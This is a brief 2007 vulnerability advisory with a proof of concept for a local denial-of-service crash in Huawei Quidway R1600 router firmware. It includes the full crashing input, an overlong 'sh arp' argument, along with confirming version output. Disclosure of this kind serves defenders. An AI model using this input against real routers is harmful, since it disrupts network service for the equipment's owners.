Quidway Router Local DOS attack<br>By: Handrix &lt;handrix_at_morx_org&gt;<br>18 January 2007<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a><br><br><br>Description:<br>The Quidway Router&#39;s firmware is vulnerable to a local denial of service attack, there are a request to turn off the engine.
<br>Simple poc realeased by :<br><br>Router&gt;sh arp AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
<br>AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br><br>After the Router crash, wait a while and type&nbsp; &quot;sh version&quot; to verify this bug:
<br><br>Router&gt;sh ver<br>&nbsp;VRP (tm) software, Version 1.43 2500E-003<br>&nbsp;Copyright (c) 1997-2002 HUAWEI TECH CO., LTD.<br>&nbsp;Compiled 20:53:47, Nov&nbsp; 7 2002 ,<br>&nbsp;Quidway R1600 uptime is 0 days 0 hours 1 minutes 3 seconds.
<br><br>&nbsp;Quidway R1600 with 1 68360 Processor<br>&nbsp;16&nbsp;&nbsp; Mbytes&nbsp;&nbsp;&nbsp; DRAM<br>&nbsp;4608 Kbytes&nbsp;&nbsp;&nbsp; Flash Memory<br>&nbsp;hardware version is 1.0<br><br><br>Vendor: Huawei<br>Vulnerable version:<br>Quidway R1600 (Versatile Routing Platform, version 
1.43 2500E-003)<br>Maybe others.<br><br>